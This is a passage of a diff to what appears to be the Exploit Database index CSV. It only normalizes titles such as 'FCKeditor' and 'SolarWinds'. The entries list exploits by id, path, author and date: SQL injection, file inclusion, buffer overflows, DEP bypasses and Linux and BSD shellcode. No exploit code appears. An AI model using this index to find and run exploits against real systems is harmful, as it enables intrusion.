'index.php' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 30093,platforms/linux/local/30093.txt,"Mutt 1.4.2 - Mutt_Gecos_Name Function Local Buffer Overflow",2007-05-28,raylai,linux,local,0 14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 -12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps,0 +12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple Vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps,0 12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 - admin/editconfig.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusion",2006-06-17,"M.Hasran Addahroni",php,webapps,0 @@ -11573,34 +11574,34 @@ id,file,description,date,author,platform,type,port 28050,platforms/windows/dos/28050.txt,"Oracle Java lookUpByteBI - Heap Buffer Overflow",2013-09-03,GuHe,windows,dos,0 28051,platforms/windows/dos/28051.py,"PotPlayer 1.5.39036 - '.wav' Crash (PoC)",2013-09-03,ariarat,windows,dos,0 28128,platforms/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,php,webapps,80 -12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (traversal)",2010-05-21,"Richard Brain",windows,webapps,0 +12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal)",2010-05-21,"Richard Brain",windows,webapps,0 12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 -12683,platforms/windows/dos/12683.pl,"Solarwinds 10.4.0.10 - TFTP Denial of Service",2010-05-21,Nullthreat,windows,dos,69 +12683,platforms/windows/dos/12683.pl,"SolarWinds 10.4.0.10 - TFTP Denial of Service",2010-05-21,Nullthreat,windows,dos,69 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0 12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0 -12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - (gallery.php) Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 -12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 administration console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0 -12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 +12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 +12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0 +12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 -14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 +14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 12692,platforms/php/webapps/12692.txt,"TinyBrowser - Remote File upload",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager - Remote File upload",2010-05-22,Ra3cH,asp,webapps,0 -12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0 +12694,platforms/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0 12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0 -12696,platforms/php/webapps/12696.txt,"E-commerce Group - 'cat.php' SQL Injection",2010-05-22,"BLack Revenge",php,webapps,0 -12697,platforms/php/webapps/12697.php,"hustoj - (fckeditor) Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0 +12696,platforms/php/webapps/12696.txt,"E-Commerce Group - 'cat.php' SQL Injection",2010-05-22,"BLack Revenge",php,webapps,0 +12697,platforms/php/webapps/12697.php,"hustoj - 'FCKeditor' Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0 12698,platforms/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,windows,dos,0 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 12700,platforms/asp/webapps/12700.txt,"DotNetNuke - Remote File upload",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0 12701,platforms/asp/webapps/12701.txt,"Rave Creations/UHM - 'artists.asp' SQL Injection",2010-05-22,Ra3cH,asp,webapps,0 12702,platforms/php/webapps/12702.php,"ECShop - search.php SQL Injection",2010-05-22,Jannock,php,webapps,0 12703,platforms/php/webapps/12703.txt,"Recipes Website 1.0 - SQL Injection",2010-05-22,Mr.ThieF,php,webapps,0 -12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - (.rm) Buffer Overflow (PoC)",2010-05-23,"sniper ip",windows,dos,0 +12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)",2010-05-23,"sniper ip",windows,dos,0 12706,platforms/php/webapps/12706.txt,"MMA Creative Design - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12707,platforms/php/webapps/12707.txt,"runt-communications Design - SQL Injection",2010-05-23,XroGuE,php,webapps,0 -12709,platforms/php/webapps/12709.txt,"webperformance Ecommerce - SQL Injection",2010-05-23,cyberlog,php,webapps,0 -12710,platforms/windows/local/12710.c,"Kingsoft WebShield KAVSafe.sys 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 +12709,platforms/php/webapps/12709.txt,"webperformance eCommerce - SQL Injection",2010-05-23,cyberlog,php,webapps,0 +12710,platforms/windows/local/12710.c,"Kingsoft Webshield KAVSafe.sys 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 12711,platforms/php/webapps/12711.txt,"BBMedia Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12712,platforms/php/webapps/12712.txt,"goffgrafix - Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0 12713,platforms/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,php,webapps,0 @@ -11627,18 +11628,18 @@ id,file,description,date,author,platform,type,port 12735,platforms/php/webapps/12735.txt,"Nitro Web Gallery - SQL Injection",2010-05-25,cyberlog,php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12737,platforms/php/webapps/12737.txt,"Simpel Side - 'index2.php' SQL Injection",2010-05-25,MN9,php,webapps,0 -12740,platforms/windows/dos/12740.py,"Webby Webserver - PoC SEH control",2010-05-25,m-1-k-3,windows,dos,0 -12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 +12740,platforms/windows/dos/12740.py,"Webby WebServer - PoC SEH control",2010-05-25,m-1-k-3,windows,dos,0 +12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 12743,platforms/php/webapps/12743.txt,"web5000 - (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0 12744,platforms/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,php,webapps,0 12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0 12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall - 'pages.php' SQL Injection",2010-05-26,Newbie_Campuz,php,webapps,0 12749,platforms/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,php,webapps,0 12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - (WebUI) Cross-Site Request Forgery Exploit",2010-05-26,l3D,windows,webapps,0 -12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - .ABR File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 -12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - .GRD File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 -12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - .ASL File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 -12754,platforms/php/webapps/12754.html,"Easy Address book Webserver 1.2 - Cross-Site Request Forgery",2010-05-26,Markot,php,webapps,0 +12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 +12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 +12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 +12754,platforms/php/webapps/12754.html,"Easy Address book WebServer 1.2 - Cross-Site Request Forgery",2010-05-26,Markot,php,webapps,0 12755,platforms/php/webapps/12755.txt,"Multi Vendor Mall - (itemdetail.php & shop.php) SQL Injection",2010-05-26,CoBRa_21,php,webapps,0 12756,platforms/php/webapps/12756.txt,"Spaceacre - 'index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,php,webapps,0 12761,platforms/php/webapps/12761.txt,"GlobalWebTek Design - SQL Injection",2010-05-27,cyberlog,php,webapps,0 @@ -11653,7 +11654,7 @@ id,file,description,date,author,platform,type,port 12771,platforms/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,php,webapps,0 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent - (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0 -12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 - (build 144) Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 +12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 12775,platforms/multiple/dos/12775.py,"VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0 @@ -11675,7 +11676,7 @@ id,file,description,date,author,platform,type,port 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0 12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 -12804,platforms/multiple/remote/12804.txt,"nginx http server 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0 +12804,platforms/multiple/remote/12804.txt,"Nginx http server 0.6.36 - Directory Traversal",2010-05-30,"cp77fk4r ",multiple,remote,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12806,platforms/php/webapps/12806.txt,"CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 @@ -11685,7 +11686,7 @@ id,file,description,date,author,platform,type,port 12812,platforms/php/webapps/12812.txt,"Joomla com_quran - SQL Injection",2010-05-30,r3m1ck,php,webapps,0 12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0 12814,platforms/php/webapps/12814.txt,"Joomla Component com_g2bridge - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0 -12815,platforms/windows/remote/12815.txt,"GoAheaad Webserver - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,windows,remote,0 +12815,platforms/windows/remote/12815.txt,"GoAheaad WebServer - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,windows,remote,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0 12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0 12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0 @@ -11695,7 +11696,7 @@ id,file,description,date,author,platform,type,port 12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs - SQL Injection",2010-05-31,d0lc3,php,webapps,0 12823,platforms/php/webapps/12823.txt,"MusicBox - SQL Injection",2010-05-31,titanichacker,php,webapps,0 12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0 -12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0 +12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long Filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0 12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 12840,platforms/php/webapps/12840.txt,"Delivering Digital Media CMS - SQL Injection",2010-06-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12841,platforms/asp/webapps/12841.txt,"Ticimax E-Ticaret - SQL Injection",2010-06-01,Neuromancer,asp,webapps,0 @@ -11713,7 +11714,7 @@ id,file,description,date,author,platform,type,port 12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 - Reinstall",2010-06-03,indoushka,php,webapps,0 12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites - (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor - (PHPsetimon) Remote File Inclusion / Local File Inclusion",2010-06-03,eidelweiss,php,webapps,0 -12865,platforms/hardware/remote/12865.txt,"Motorola SURFBoard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0 +12865,platforms/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0 12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0 12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0 12868,platforms/php/webapps/12868.txt,"Joomla Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0 @@ -11736,11 +11737,11 @@ id,file,description,date,author,platform,type,port 13257,platforms/bsdi_x86/shellcode/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0 13258,platforms/bsdi_x86/shellcode/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0 40087,platforms/multiple/dos/40087.txt,"Adobe Flash - ATF Processing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 -40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double Free",2016-07-11,"Google Security Research",multiple,dos,0 +40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double-Free",2016-07-11,"Google Security Research",multiple,dos,0 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0 40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 -40095,platforms/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (1)",2016-07-13,COSIG,multiple,dos,0 +40095,platforms/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (1)",2016-07-13,COSIG,multiple,dos,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 - links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 13260,platforms/bsdi_x86/shellcode/13260.c,"BSDi/x86 - execve /bin/sh toupper evasion Shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode,0 13261,platforms/freebsd/shellcode/13261.txt,"FreeBSD i386 & AMD64 - Execve /bin/sh Shellcode (Anti-Debugging) (140 bytes)",2009-04-13,c0d3_z3r0,freebsd,shellcode,0 @@ -12098,7 +12099,7 @@ id,file,description,date,author,platform,type,port 13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - hard / unclean reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - hard / unclean reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 -13735,platforms/osx/remote/13735.py,"OS X EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080 +13735,platforms/osx/remote/13735.py,"Apple Mac OS X EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080 13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla Component com_djartgallery - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0 @@ -12118,7 +12119,7 @@ id,file,description,date,author,platform,type,port 13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System - Local File Inclusion",2010-06-06,AntiSecurity,php,webapps,0 13751,platforms/php/webapps/13751.txt,"greeting card - Remote Upload",2010-06-06,Mr.Benladen,php,webapps,0 13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0 -13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0 +13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0 13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow (PoC)",2010-06-07,sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 @@ -12126,7 +12127,7 @@ id,file,description,date,author,platform,type,port 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0 -13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' Stack Buffer Overflow DEP bypass Exploit",2010-06-08,mr_me,php,local,0 +13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' Stack Buffer Overflow DEP Bypass Exploit",2010-06-08,mr_me,php,local,0 13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 @@ -12176,14 +12177,14 @@ id,file,description,date,author,platform,type,port 13814,platforms/asp/webapps/13814.txt,"Pars Design CMS - Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 13815,platforms/asp/webapps/13815.pl,"Netvolution CMS 2.x - SQL Injection Script",2010-06-10,"amquen and krumel",asp,webapps,0 13816,platforms/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection",2010-06-10,"L0rd CrusAd3r",php,webapps,0 -13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - .INDD File Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 +13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - '.INDD' File Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / Denial of Service",2010-06-11,Dr_IDE,windows,remote,0 13819,platforms/php/webapps/13819.txt,"E-PHP B2B Marketplace - Multiple Vulnerabilities",2010-06-11,MizoZ,php,webapps,0 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0 13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0 -13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - (Mobile Office Suite) XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 -13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 -13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - XLS Denial-of-Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - (Mobile Office Suite) XLS Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - XLS Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - XLS Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13826,platforms/php/webapps/13826.txt,"Site for Real Estate - Brokers SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13827,platforms/php/webapps/13827.txt,"Development Site Professional Liberal - Company Institutional SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0 @@ -12192,9 +12193,9 @@ id,file,description,date,author,platform,type,port 13831,platforms/php/webapps/13831.txt,"Full Site for Restaurant - SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion",2010-06-11,"cr4wl3r ",php,webapps,0 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) - Local File Inclusion",2010-06-11,"Pouya Daneshmand",php,webapps,0 -13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0 -13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - (FCKeditor) Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0 -13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0 +13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0 +13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - 'FCKeditor' Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0 +13836,platforms/windows/dos/13836.py,"SolarWinds 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local Denial of Service (PoC)",2010-06-12,R3d-D3V!L,windows,dos,0 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0 13840,platforms/asp/webapps/13840.txt,"VU Case Manager - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 @@ -12238,15 +12239,15 @@ id,file,description,date,author,platform,type,port 13886,platforms/asp/webapps/13886.txt,"IISWorks FileMan - fileman.mdb Remote User Database Disclosure",2010-06-15,j0fer,asp,webapps,0 13887,platforms/windows/dos/13887.c,"Winplot 2010 - Buffer Overflow (PoC)",2010-06-15,"fl0 fl0w",windows,dos,0 13888,platforms/windows/dos/13888.c,"SasCam 2.6.5 - Remote HTTP Server Crash",2010-06-15,"fl0 fl0w",windows,dos,0 -13889,platforms/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 -13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 Beta - Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0 +13889,platforms/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion",2010-06-16,sh00t0ut,php,webapps,0 +13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 Beta - Remote File Inclusion",2010-06-16,sh00t0ut,php,webapps,0 13891,platforms/asp/webapps/13891.html,"AspTR EXtended - Cross-Site Request Forgery Bug",2010-06-16,FreWaL,asp,webapps,0 13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem - Upload",2010-06-16,Sid3^effects,php,webapps,0 -13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0 +13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - 'FCKeditor' Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0 13894,platforms/php/webapps/13894.txt,"2DayBiz Online Classified System - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0 13897,platforms/php/webapps/13897.txt,"Real Estate - SQL Injection",2010-06-16,"L0rd CrusAd3r",php,webapps,0 -13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0 +13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - 'FCKeditor' Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0 